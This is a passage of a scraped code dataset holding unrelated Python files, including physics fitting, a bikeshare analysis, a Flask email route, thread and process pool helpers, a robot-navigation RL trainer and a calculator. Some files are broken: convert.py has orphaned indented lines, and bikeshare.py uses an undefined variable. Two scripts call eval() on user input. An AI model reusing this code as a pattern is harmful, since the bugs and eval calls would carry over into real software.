cf.Corr2(datatag='Ds', tp=tp, tmin=tmin, a=('Ds:a', 'Dso:a'), b=('Ds:a', 'Dso:a'), dE=('Ds:dE',\n 'Dso:dE')),\n cf.Corr3(datatag='3ptT15', T=15, tmin=tmin, a='etas:a', dEa='etas:dE', b=('Ds:a', 'Dso:a'), dEb=('Ds:dE',\n 'Dso:dE'), Vnn='Vnn', Vno='Vno'),\n cf.Corr3(datatag='3ptT16', T=16, tmin=tmin, a='etas:a', dEa='etas:dE', b=('Ds:a', 'Dso:a'), dEb=('Ds:dE',\n 'Dso:dE'), tpb=tp, Vnn='Vnn', Vno='Vno')]\n return models\n\n\ndef make_prior(N):\n \"\"\" Create priors for fit parameters. \"\"\"\n prior = gv.BufferDict()\n metas = gv.gvar('0.4(2)')\n prior['log(etas:a)'] = gv.log(gv.gvar(N * ['0.3(3)']))\n prior['log(etas:dE)'] = gv.log(gv.gvar(N * ['0.5(5)']))\n prior['log(etas:dE)'][0] = gv.log(metas)\n mDs = gv.gvar('1.2(2)')\n prior['log(Ds:a)'] = gv.log(gv.gvar(N * ['0.3(3)']))\n prior['log(Ds:dE)'] = gv.log(gv.gvar(N * ['0.5(5)']))\n prior['log(Ds:dE)'][0] = gv.log(mDs)\n prior['log(Dso:a)'] = gv.log(gv.gvar(N * ['0.1(1)']))\n prior['log(Dso:dE)'] = gv.log(gv.gvar(N * ['0.5(5)']))\n prior['log(Dso:dE)'][0] = gv.log(mDs + gv.gvar('0.3(3)'))\n prior['Vnn'] = gv.gvar(N * [N * ['0(1)']])\n prior['Vno'] = gv.gvar(N * [N * ['0(1)']])\n return prior\n\n\ndef print_results(fit, prior, data):\n \"\"\" Report best-fit results. \"\"\"\n print('Fit results:')\n p = fit.p\n E_etas = np.cumsum(p['etas:dE'])\n a_etas = p['etas:a']\n print(' Eetas:', E_etas[:3])\n print(' aetas:', a_etas[:3])\n E_Ds = np.cumsum(p['Ds:dE'])\n a_Ds = p['Ds:a']\n print('\\n EDs:', E_Ds[:3])\n print(' aDs:', a_Ds[:3])\n E_Dso = np.cumsum(p['Dso:dE'])\n a_Dso = p['Dso:a']\n print('\\n EDso:', E_Dso[:3])\n print(' aDso:', a_Dso[:3])\n Vnn = p['Vnn']\n Vno = p['Vno']\n print('\\n etas->V->Ds =', Vnn[(0, 0)])\n print(' etas->V->Dso =', Vno[(0, 0)])\n outputs = collections.OrderedDict()\n outputs['metas'] = E_etas[0]\n outputs['mDs'] = E_Ds[0]\n outputs['mDso-mDs'] = E_Dso[0] - E_Ds[0]\n outputs['Vnn'] = Vnn[(0, 0)]\n outputs['Vno'] = Vno[(0, 0)]\n inputs = collections.OrderedDict()\n inputs['statistics'] = data\n inputs.update(prior)\n inputs['svd'] = fit.svdcorrection\n print('\\n' + gv.fmt_values(outputs))\n print(gv.fmt_errorbudget(outputs, inputs))\n print('\\n')\n\n\nif sys.argv[1:]:\n SHOWPLOTS = eval(sys.argv[1])\nif SHOWPLOTS:\n try:\n import matplotlib\n except ImportError:\n SHOWPLOTS = False\n\nif __name__ == '__main__':\n main()","sub_path":"pycfiles/corrfitter-8.0.3.tar/etas-Ds.cpython-34.py","file_name":"etas-Ds.cpython-34.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"435078703","text":"# Pair Sum\n\n# You have been given an integer array/list(ARR) and a number X. Find and return the total number of pairs in the array/list which sum to X.\n# Note:\n# Given array/list can contain duplicate elements. \n# Input format :\n# The first line contains an Integer 't' which denotes the number of test cases or queries to be run. Then the test cases follow.\n\n# First line of each test case or query contains an integer 'N' representing the size of the first array/list.\n\n# Second line contains 'N' single space separated integers representing the elements in the array/list.\n\n# Third line contains an integer 'X'.\n# Output format :\n# For each test case, print the total number of pairs present in the array/list.\n\n# Output for every test case will be printed in a separate line.\n# Constraints :\n# 1 <= t <= 10^2\n# 0 <= N <= 10^3\n# 0 <= X <= 10^9\n# Time Limit: 1 sec\n# Sample Input 1:\n# 1\n# 9\n# 1 3 6 2 5 4 3 2 4\n# 7\n# Sample Output 1:\n# 7\n# Sample Input 2:\n# 2\n# 9\n# 1 3 6 2 5 4 3 2 4\n# 12\n# 6\n# 2 8 10 5 -2 5\n# 10\n# Sample Output 2:\n# 0\n# 2\n\n\n# Explanation for Input 2:\n# Since there doesn't exist any pair with sum equal to 12 for the first query, we print 0.\n\n# For the second query, we have 2 pairs in total that sum up to 10. They are, (2, 8) and (5, 5).\n\ndef pair_sum(arr, size, s):\n count = 0\n for i in range(size):\n for j in range(i + 1, size):\n if (arr[i] + arr[j]) == s:\n print(arr[i], arr[j])\n count += 1\n return count\n\nsize = int(input(\"Enter the size of array: \\n\"))\narr = list(map(int,input().split()))[ : size]\ns = int(input(\"Enter the sum value: \\n\"))\nprint(pair_sum(arr, size, s))","sub_path":"pair_sum.py","file_name":"pair_sum.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"502433745","text":"# wget https://www.dropbox.com/s/3z11cpntwuasm43/08127_image.png?dl=0; mv 08127_image.png?dl=0 08127_image.png \nimport caffenet\nimport caffe\nimport torch\nimport numpy as np\nfrom torch.autograd import Variable\n\n\ndef load_image(imgfile):\n height, width = 700, 700 \n image = caffe.io.load_image(imgfile)\n transformer = caffe.io.Transformer({'data': (1, 3, height, width)})\n transformer.set_transpose('data', (2, 0, 1))\n transformer.set_mean('data', np.array([104., 117., 123.]))\n transformer.set_raw_scale('data', 7.2801098892805181)\n transformer.set_channel_swap('data', (2, 1, 0))\n image = transformer.preprocess('data', image)\n image = image.reshape(1, 3, height, width)\n return image\n\n\n\n net = caffenet.CaffeNet(protofile)\n print(net)\n net.load_weights(weightfile)\n net.eval()\n image = torch.from_numpy(image)\n image = Variable(image)\n blobs = net(image)\n return blobs, net.models\n\n\nprotofile = '/models/testpy_val_91_500_pkg.prototxt'\nweightfile = '/models/test2.caffemodel'\nimgfn = '08127_image.png'\n\n\nimage = torch.from_numpy(load_image(imgfn))\nimage = Variable(image)\nnet = caffenet.CaffeNet(protofile)\nnet.load_weights(weightfile)\n# net = caffenet.CaffeNet(protofile)\n# print(net)\n# net.load_weights(weightfile)\n# net.eval()\n\nblobs = net(image)\n","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"497966240","text":"import time\nimport numpy as np\nimport pandas as pd \nimport statistics\nimport datetime\nimport json\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n#valid month entry - removed invalid months\nMONTH_DATA = ['january', 'february', 'march', 'april', 'may', 'june', 'all']\n#valid day entry\nDAY_DATA = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday', 'all']\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('Hello! Let\\'s explore some US bikeshare data!')\n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n while True:\n print('Enter City that you would like to explore:')\n print('\\nEnter Chicago, New York city, Washington')\n #change the case tp lower\n city=input().lower()\n if city!='chicago':\n if city!='new york city':\n if city!='washington':\n print(\"Sorry that city is not in the above list...Try again...\")\n else:\n break\n else:\n break\n else:\n break\n #get user input for month (all, january, february, ... , june)\n while True:\n month = input(\"\\nWhich month would you like results? January, February, March, April, May, June or all ?\\n\")\n #change the case tp lower\n month = month.lower()\n if month not in MONTH_DATA:\n print(\"Sorry that month is not in the above list...Try again\")\n continue\n else:\n break\n\n \n \n # get user input for day of week (all, monday, tuesday, ... sunday)\n while True:\n day = input(\"\\nEnter a specific day as follows: Sunday, Monday, Tuesday, Wednesday, Thursday, Friday, Saturday or all for all days.\\n\")\n #change the case tp lower\n day = day.lower()\n if day not in DAY_DATA:\n print(\"Sorry that day is not in the above list...Try again...\")\n continue\n else:\n break\n \n print('-'*40)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n # load data file into a dataframe\n df=pd.read_csv(CITY_DATA[city])\n \n # convert the Start Time column to datetime\n df['Start Time']=pd.to_datetime(df['Start Time'])\n \n # extract month and day of week from Start Time to create new columns\n df['month']=df['Start Time'].dt.month\n df['day_of_week']=df['Start Time'].dt.weekday_name\n \n # filter by month if applicable\n if month!='all':\n #use the index of the month list to get the corresponding int\n # Account for ValueError: 'july'thru December is not in list\n months=['january','february','march','april','may','june','july']\n month=months.index(month)+1\n \n # filter by month to create the new dataframe\n df = df[df['month'] == month]\n \n if day != 'all':\n df = df[df['day_of_week'] == day.title()]\n \n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n \n return df\n\n \ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n \n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n \n # TO DO: display the most common month\n common_month = df['month'].value_counts().idxmax()\n print(\"The most common month from the data is: \" , common_month)\n\n # TO DO: display the most common day of week\n common_day_of_week = df['day_of_week'].value_counts().idxmax()\n print(\"The most common day of week from the data is: \", common_day_of_week)\n\n # TO DO: display the most common start hour\n df['hour'] = df['Start Time'].dt.hour\n common_hour = df['hour'].value_counts().idxmax()\n print('The most Common Hour from the data is:', common_hour)\n\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip of a given city.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n \n # TO DO: display most commonly used start station\n start_Station = df['Start Station'].value_counts().idxmax()\n print('Most Commonly used start station:', start_Station)\n \n # TO DO: display most commonly used end station\n end_Station = df['End Station'].value_counts().idxmax()\n print('\\nMost Commonly used end station:', end_Station)\n \n # TO DO: display most frequent combination of start station and end station trip\n #combo_Station = df.groupby(['Start Station','End Station']).size().nlargest(1)\n combo_Station = df.groupby(['Start Station','End Station'])\n combo_Station = combo_Station.size().sort_values(ascending=False).head(1)\n print('\\nMost Commonly used Combo_Station of start station and end station trip:', combo_Station)\n \n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n total_travel_time = df['Trip Duration'].sum()\n print('Total Travel Time:', total_travel_time)\n\n # display mean travel time\n mean_travel_time = df['Trip Duration'].mean()\n print('Mean Travel Time:', mean_travel_time)\n\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n \n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n \n # Display counts of user types\n print(df['User Type'].value_counts())\n\n # Display counts of gender\n if 'Gender' in df.columns:\n print(df['Gender'].value_counts())\n \n # Display earliest, most recent, and most common year of birth\n if 'Birth Year' in df.columns:\n print(\"\\n The earliest year of birth is\")\n print(min(df['Birth Year']))\n \n #Display most recent year of birth\n if 'Birth Year' in df.columns:\n print(\"\\n The most recent year of birth is\")\n print(max(df['Birth Year'])) \n \n #Display most common year of birth\n if 'Birth Year' in df.columns:\n print(\"\\n The most common year of birth is\")\n print(df['Birth Year'].mode()) \n #print(statistics.mode(df['Birth Year']))\n \n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\ndef show_rows(df):\n\n \"\"\"Displays 5 Rows to the user. \"\"\"\n \n print('\\nDetermining show rows?...\\n')\n start_time = time.time()\n \n i = 0\n show_data = input(\"\\nWould you like to see 5 rows of Data? Enter yes or no.\\n\").lower()\n show_data = show_data.lower() #convert the user input to lower case using lower() function\n pd.set_option('display.max_columns',200)\n\n while True: \n if show_data == 'no':\n break\n elif show_data == 'yes':\n print(df[i:i+5]) #appropriately subset/slice your dataframe to display next five rows\n #print(df[i:i+5].to_json(orient ='index', lines=False)) #appropriately subset/slice your dataframe to display next five rows\n show_data = input(\"\\nWould you like to see 5 more rows of Data? Enter 'yes' or 'no'.\\n\").lower()\n i += 5\n else:\n show_data = input(\"\\nYour input is invalid. Please enter only 'yes' or 'no'\\n\").lower()\n \n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40) \n \ndef main():\n \"\"\"This is the main method of the which starts the program.. \"\"\"\n\n while True:\n city, month, day = get_filters()\n print(city, month, day)\n \n df = load_data(city, month, day)\n show_rows(df)\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n \n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":8889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"325815749","text":"\"\"\"\nExperiment configuration for:\nModel: RE-Flex\nBenchmark: zsre\n\"\"\"\nimport fasttext\nimport spacy\nfrom reflex.reflex_runner import ReflexRunner\nfrom reflex.utils import setup_experiment, save_reflex_e_list\nimport pickle\nimport os\n\nex = setup_experiment('RE-Flex zsre 3 relations lambda')\n\n@ex.config\ndef conf():\n model_dir = os.path.join(os.environ['BASE_PATH'], 'weights/roberta_large') # Path to trained weights\n model_name = os.path.join(os.environ['BASE_PATH'], 'weights/roberta_large/model.pt')\n relations_filepath = os.path.join(os.environ['BASE_PATH'], 'data/zsre_3_relations.jsonl') # Path to relations file\n data_directory = os.path.join(os.environ['BASE_PATH'], 'data/zsre/test') # Path to underlying data\n hyperparam_path = os.path.join(os.environ['BASE_PATH'], 'zsre_tune.pkl')\n error_path = os.path.join(os.environ['BASE_PATH'], 'figures', 'reflex_zsre2.csv')\n batch_size = 16\n must_choose_answer = False\n device = 'cuda'\n k = 16\n ls = [-2, -1.5, -1, -0.5, 0, 0.5, 1, 1.5, 2]\n override_expand = False\n override_expand_value = False\n word_embeddings_path = os.path.join(os.environ['BASE_PATH'], 'weights/crawl-300d-2M-subword.bin')\n\n@ex.automain\ndef main(model_dir, model_name, device, relations_filepath, data_directory, batch_size, must_choose_answer, word_embeddings_path, k, hyperparam_path, error_path, override_expand, override_expand_value, ls):\n with open(hyperparam_path, 'rb') as rf:\n hyperparams = pickle.load(rf)\n\n spacy_model = spacy.load('en_core_web_lg')\n we_model = fasttext.load_model(word_embeddings_path)\n runner = ReflexRunner(model_dir, model_name, device, relations_filepath, data_directory, batch_size, must_choose_answer, 0, we_model, spacy_model, k, override_expand_value, hyperparams=hyperparams)\n runner.override_l = True\n result_dict = {}\n for l in ls:\n runner.update_l(l)\n em, f1, per_relation_metrics = runner.predict()\n result_dict[l] = per_relation_metrics\n with open('zsre_3.pkl', 'wb') as wf:\n pickle.dump(result_dict, wf)\n return result_dict\n\n","sub_path":"reflex/experiments/zsre_3.py","file_name":"zsre_3.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"347631481","text":"from django.core.exceptions import ValidationError\nimport re\n\n\ndef validate_amount(amount):\n amount = str(amount)\n if not re.match(r\"^[0-9]{1,5}\\.[0-9]{2}$\", amount):\n raise ValidationError(\n 'Incorrect amount provided, should match positive with two decimals',\n params={'amount': amount}\n )\n","sub_path":"djangoapp/djangoapp/apps/balance/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"114933134","text":"import re\n\nfrom flask import Blueprint, jsonify, request\n\nfrom common.smtp import sendEmail\n\nverification_Blue = Blueprint('verification', __name__)\n\n\n@verification_Blue.route('/member/verification/', methods=['GET'], strict_slashes=False)\ndef sendVerification():\n # 发送验证码\n user_email = request.args.get('email')\n if user_email == '' or user_email is None:\n return jsonify({'code': 3001, 'message': 'Please entry your email'})\n elif re.match(r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+.[a-zA-Z]{1,3}$', user_email):\n sendEmail(user_email)\n return jsonify({'code': 200, 'message': 'Send a success'})\n else:\n return jsonify({'code': 3002, 'message': 'Please check your email format'})\n\n","sub_path":"member/verification.py","file_name":"verification.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"505656984","text":"'''\r\nAuthor : hupeng\r\nTime : 2021/8/10 10:19 \r\nDescription: \r\n'''\r\nimport time\r\nimport multiprocessing\r\nfrom collections import defaultdict, OrderedDict\r\nfrom multiprocessing import cpu_count\r\nfrom concurrent.futures import ThreadPoolExecutor\r\n\r\n\r\nclass MultiPool(object):\r\n def __init__(self, max_workers=None, initializer=None, initargs=(),\r\n maxtasksperchild=None):\r\n if max_workers is None:\r\n max_workers = cpu_count()\r\n\r\n multiprocessing.freeze_support()\r\n self.pool = multiprocessing.Pool(processes=max_workers, initializer=initializer, initargs=initargs,\r\n maxtasksperchild=maxtasksperchild)\r\n\r\n def submit(self, func, args=(), callback=None,\r\n error_callback=None, **kwargs):\r\n return self.pool.apply_async(func, args=args, kwds=kwargs, callback=callback,\r\n error_callback=error_callback)\r\n\r\n def close(self):\r\n return self.pool.close()\r\n\r\n def join(self):\r\n return self.pool.join()\r\n\r\n\r\nclass ThreadPool(object):\r\n def __init__(self):\r\n self.pool = ThreadPoolExecutor()\r\n\r\n def __call__(self, *args, **kwargs):\r\n return self.pool\r\n\r\n\r\nthread_pool = ThreadPool()\r\n\r\n\r\nclass GeneralAsync(object):\r\n __POOL = {'thread': thread_pool, 'process': MultiPool}\r\n\r\n def __init__(self, num_processor=None, mode='thread'):\r\n self._funcs = []\r\n self.num_processor = num_processor\r\n self.mode = mode\r\n assert mode in self.__POOL, \\\r\n f'mode param must be `thread` or `process`, but given {mode}'\r\n\r\n def __getattr__(self, item):\r\n pass\r\n\r\n def _pool(self, **kwargs):\r\n return self.__POOL[self.mode](**kwargs)\r\n\r\n def add_func(self, func, f_name=None, **params):\r\n '''\r\n 追加并行执行的任务\r\n :param func: func\r\n :param params: param1, param2\r\n :return:\r\n '''\r\n assert callable(func), 'func object must be callable'\r\n params['func'] = func\r\n params['f_name'] = f_name or func.__name__\r\n self._funcs.append(params)\r\n\r\n def run(self):\r\n task = OrderedDict()\r\n response = defaultdict(list)\r\n pool = self._pool(max_workers=len(self._funcs))\r\n\r\n for func_info in self._funcs:\r\n func = func_info.pop('func')\r\n f_name = func_info.pop('f_name')\r\n task[f_name] = pool.submit(func, **func_info)\r\n\r\n if self.mode == 'process':\r\n pool.close()\r\n pool.join()\r\n\r\n for name, t in task.items():\r\n result = t.result() if hasattr(t, 'result') else t.get()\r\n setattr(self, name, result)\r\n response[name].append(result)\r\n return response\r\n","sub_path":"fairy/utils/asyncs.py","file_name":"asyncs.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"363621419","text":"import os\nimport rospy\n\nfrom datetime import datetime as dt\n\nfrom stable_baselines3 import PPO\nfrom stable_baselines3.common.vec_env import SubprocVecEnv, DummyVecEnv, VecNormalize\nfrom stable_baselines3.common.monitor import Monitor\nfrom stable_baselines3.common.callbacks import EvalCallback\n\nfrom task_generator.task_generator.tasks import get_predefined_task\nfrom arena_navigation.arena_local_planner.learning_based.arena_local_planner_drl.scripts.custom_policy import *\nfrom arena_navigation.arena_local_planner.learning_based.arena_local_planner_drl.rl_agent.envs.flatland_gym_env import FlatlandEnv\nfrom arena_navigation.arena_local_planner.learning_based.arena_local_planner_drl.tools.argsparser import parse_training_args\nfrom arena_navigation.arena_local_planner.learning_based.arena_local_planner_drl.tools.train_agent_utils import *\nfrom arena_navigation.arena_local_planner.learning_based.arena_local_planner_drl.tools.custom_mlp_utils import *\nfrom arena_navigation.arena_local_planner.learning_based.arena_local_planner_drl.tools.staged_train_callback import InitiateNewTrainStage\n\n##### HYPERPARAMETER #####\n\"\"\" will be used upon initializing new agent \"\"\"\nrobot = \"myrobot\"\ngamma = 0.99\nn_steps = 128\nent_coef = 0.01\nlearning_rate = 2.5e-4\nvf_coef = 0.5\nmax_grad_norm = 0.5\ngae_lambda = 0.95\nbatch_size = 64\nn_epochs = 4\nclip_range = 0.2\nreward_fnc = \"rule_01\"\ndiscrete_action_space = False\nnormalize = True\nstart_stage = 1\ntask_mode = \"staged\" # custom, random or staged\nnormalize = True\n##########################\n\n\ndef get_agent_name(args):\n \"\"\" Function to get agent name to save to/load from file system\n \n Example names:\n \"MLP_B_64-64_P_32-32_V_32-32_relu_2021_01_07__10_32\"\n \"DRL_LOCAL_PLANNER_2021_01_08__7_14\"\n\n :param args (argparse.Namespace): Object containing the program arguments\n \"\"\"\n START_TIME = dt.now().strftime(\"%Y_%m_%d__%H_%M\")\n\n if args.custom_mlp:\n return \"MLP_B_\" + args.body + \"_P_\" + args.pi + \"_V_\" + args.vf + \"_\" + args.act_fn + \"_\" + START_TIME\n if args.load is None:\n return args.agent + \"_\" + START_TIME\n return args.load\n\n\ndef get_paths(agent_name: str, args) -> dict:\n \"\"\" Function to generate agent specific paths \n \n :param agent_name: Precise agent name (as generated by get_agent_name())\n :param args (argparse.Namespace): Object containing the program arguments\n \"\"\"\n dir = rospkg.RosPack().get_path('arena_local_planner_drl')\n\n PATHS = {\n 'model' : os.path.join(dir, 'agents', agent_name),\n 'tb' : os.path.join(dir, 'training_logs', 'tensorboard', agent_name),\n 'eval' : os.path.join(dir, 'training_logs', 'train_eval_log', agent_name),\n 'robot_setting' : os.path.join(rospkg.RosPack().get_path('simulator_setup'), 'robot', robot + '.model.yaml'),\n 'robot_as' : os.path.join(rospkg.RosPack().get_path('arena_local_planner_drl'), 'configs', 'default_settings.yaml'),\n 'curriculum' : os.path.join(rospkg.RosPack().get_path('arena_local_planner_drl'), 'configs', 'training_curriculum.yaml')\n }\n # check for mode\n if args.load is None:\n os.makedirs(PATHS.get('model'))\n else:\n if not os.path.isfile(os.path.join(PATHS.get('model'), AGENT_NAME + \".zip\")) and not os.path.isfile(os.path.join(PATHS.get('model'), \"best_model.zip\")):\n raise FileNotFoundError(\"Couldn't find model named %s.zip' or 'best_model.zip' in '%s'\" % (AGENT_NAME, PATHS.get('model')))\n # evaluation log enabled\n if args.eval_log:\n if not os.path.exists(PATHS.get('eval')):\n os.makedirs(PATHS.get('eval'))\n else:\n PATHS['eval'] = None\n # tensorboard log enabled\n if args.tb:\n if not os.path.exists(PATHS.get('tb')):\n os.makedirs(PATHS.get('tb'))\n else:\n PATHS['tb'] = None\n\n return PATHS\n\n\nif __name__ == \"__main__\":\n args, _ = parse_training_args()\n\n rospy.init_node(\"train_node\")\n\n # generate agent name and model specific paths\n AGENT_NAME = get_agent_name(args)\n PATHS = get_paths(AGENT_NAME, args)\n\n print(\"________ STARTING TRAINING WITH: %s ________\\n\" % AGENT_NAME)\n\n # initialize hyperparameters (save to/ load from json)\n hyperparams_obj = agent_hyperparams(\n AGENT_NAME, robot, gamma, n_steps, ent_coef, learning_rate, vf_coef,max_grad_norm, gae_lambda, batch_size, \n n_epochs, clip_range, reward_fnc, discrete_action_space, normalize, task_mode, start_stage)\n params = initialize_hyperparameters(agent_name=AGENT_NAME, PATHS=PATHS, hyperparams_obj=hyperparams_obj, load_target=args.load)\n\n # instantiate gym environment\n n_envs = 1\n task_manager = get_predefined_task(params['task_mode'], params['curr_stage'], PATHS)\n env = DummyVecEnv(\n [lambda: FlatlandEnv(task_manager, PATHS.get('robot_setting'), PATHS.get('robot_as'), params['reward_fnc'], params['discrete_action_space'], goal_radius=1.00, max_steps_per_episode=200)] * n_envs)\n if params['normalize']:\n env = VecNormalize(env, training=True, norm_obs=True, norm_reward=False, clip_reward=15)\n\n # instantiate eval environment\n trainstage_cb = InitiateNewTrainStage(TaskManager=task_manager, TreshholdType=\"rew\", rew_threshold=14.5, task_mode=params['task_mode'], verbose=1)\n eval_env = Monitor(FlatlandEnv(\n task_manager, PATHS.get('robot_setting'), PATHS.get('robot_as'), params['reward_fnc'], params['discrete_action_space'], goal_radius=1.00, max_steps_per_episode=250),\n PATHS.get('eval'), info_keywords=(\"done_reason\",))\n eval_env = DummyVecEnv([lambda: eval_env])\n if params['normalize']:\n eval_env = VecNormalize(eval_env, training=False, norm_obs=True, norm_reward=False, clip_reward=15)\n eval_cb = EvalCallback(\n eval_env, n_eval_episodes=20, eval_freq=15000, log_path=PATHS.get('eval'), best_model_save_path=PATHS.get('model'), deterministic=True, callback_on_new_best=trainstage_cb)\n\n # determine mode\n if args.custom_mlp:\n # custom mlp flag\n model = PPO(\"MlpPolicy\", env, policy_kwargs = dict(net_arch = args.net_arch, activation_fn = get_act_fn(args.act_fn)), \n gamma = gamma, n_steps = n_steps, ent_coef = ent_coef, learning_rate = learning_rate, vf_coef = vf_coef, \n max_grad_norm = max_grad_norm, gae_lambda = gae_lambda, batch_size = batch_size, n_epochs = n_epochs, clip_range = clip_range, \n tensorboard_log = PATHS.get('tb'), verbose = 1)\n elif args.agent is not None:\n # predefined agent flag\n if args.agent == \"MLP_ARENA2D\":\n model = PPO(MLP_ARENA2D_POLICY, env, gamma = gamma, n_steps = n_steps, ent_coef = ent_coef, \n learning_rate = learning_rate, vf_coef = vf_coef, max_grad_norm = max_grad_norm, gae_lambda = gae_lambda, \n batch_size = batch_size, n_epochs = n_epochs, clip_range = clip_range, tensorboard_log = PATHS.get('tb'), verbose = 1)\n\n elif args.agent == \"DRL_LOCAL_PLANNER\" or args.agent == \"CNN_NAVREP\":\n if args.agent == \"DRL_LOCAL_PLANNER\":\n policy_kwargs = policy_kwargs_drl_local_planner\n else:\n policy_kwargs = policy_kwargs_navrep\n\n model = PPO(\"CnnPolicy\", env, policy_kwargs = policy_kwargs, \n gamma = gamma, n_steps = n_steps, ent_coef = ent_coef, learning_rate = learning_rate, vf_coef = vf_coef, \n max_grad_norm = max_grad_norm, gae_lambda = gae_lambda, batch_size = batch_size, n_epochs = n_epochs, \n clip_range = clip_range, tensorboard_log = PATHS.get('tb'), verbose = 1)\n else:\n # load flag\n if os.path.isfile(os.path.join(PATHS.get('model'), AGENT_NAME + \".zip\")):\n model = PPO.load(os.path.join(PATHS.get('model'), AGENT_NAME), env)\n elif os.path.isfile(os.path.join(PATHS.get('model'), \"best_model.zip\")):\n model = PPO.load(os.path.join(PATHS.get('model'), \"best_model\"), env)\n\n # set num of timesteps to be generated robot\n if args.n is None:\n n_timesteps = 60000000\n else:\n n_timesteps = args.n\n\n # start training\n model.learn(total_timesteps = n_timesteps, callback=eval_cb, reset_num_timesteps = False)\n\n # update the timesteps the model has trained in total\n update_total_timesteps_json(hyperparams_obj, n_timesteps, PATHS)\n print(\"training done!\")\n \n\"\"\"\n s = time.time()\n model.learn(total_timesteps = 3000)\n print(\"steps per second: {}\".format(1000 / (time.time() - s)))\n # obs = env.reset()\n # for i in range(1000):\n # action, _state = model.predict(obs, deterministic = True)\n # obs, reward, done, info = env.step(action)\n # env.render()\n # if done:\n # obs = env.reset()\n\"\"\"","sub_path":"arena_navigation/arena_local_planner/learning_based/arena_local_planner_drl/scripts/training/train_agent.py","file_name":"train_agent.py","file_ext":"py","file_size_in_byte":8779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"72999144","text":"import os\nos.environ.setdefault('DJANGO_SETTINGS_MODULE',\n 'WebSite.settings')\n\n\nimport django\ndjango.setup()\n\nfrom saltfish.models import Category\n\n\ndef populate():\n categories = ['sports', 'luggage', 'booties', ' cosmetics', 'digital',\n 'furniture', 'home appliances', 'medicine']\n for cat in categories:\n add_category(cat)\n\n\ndef add_category(name):\n c = Category.objects.get_or_create(name=name)[0]\n c.save()\n\n\nif __name__ == '__main__':\n print('Starting saltfish population script...')\n populate()\n","sub_path":"WebSite/populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"152760478","text":"menu = input(open(\"Menu.txt\").read())\r\n\r\nwhile menu not in [str(i) for i in range(1,12)]:\r\n menu = input(\"Inccorect Input\\n>>> \")\r\n\r\nDict = {\"1\":\"+\",\"2\":\"-\",\"3\":\"*\",\"4\":\"/\",\"5\":\"**\",\"6\":\"%\",\"7\":\"<<\",\"8\":\">>\",\"9\":\"&\",\"10\":\"|\",\"11\":\"^\",}\r\n(num1, num2) = (\"\", \"\")\r\nwhile (num1 + num2).isdigit()!=True:\r\n num1 = input(\"Enter your first number: \")\r\n num2 = input(\"Enter your second number: \")\r\n if (num1 + num2).isdigit()!=True: print(\"\\nNot a valid input!\")\r\n\r\nprint(num1, Dict[menu], num2, \"=\",eval(num1+Dict[menu]+num2))\r\n","sub_path":"Python/PYTHONchallenges/Python/Python/Python 